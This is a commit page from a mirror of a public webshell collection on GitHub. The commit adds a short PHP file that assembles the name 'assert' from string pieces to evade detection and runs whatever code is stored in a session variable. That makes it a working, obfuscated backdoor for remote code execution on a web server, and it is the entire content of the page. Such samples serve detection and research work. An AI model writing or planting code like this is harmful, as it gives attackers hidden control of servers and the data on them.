1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
tennc
2022-09-09 23:12:00 +08:00
committed by GitHub
parent 4837a655b7
commit 33e854d721

8
php/2022-09-09-03.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c($_SESSION['dmeo']);
?>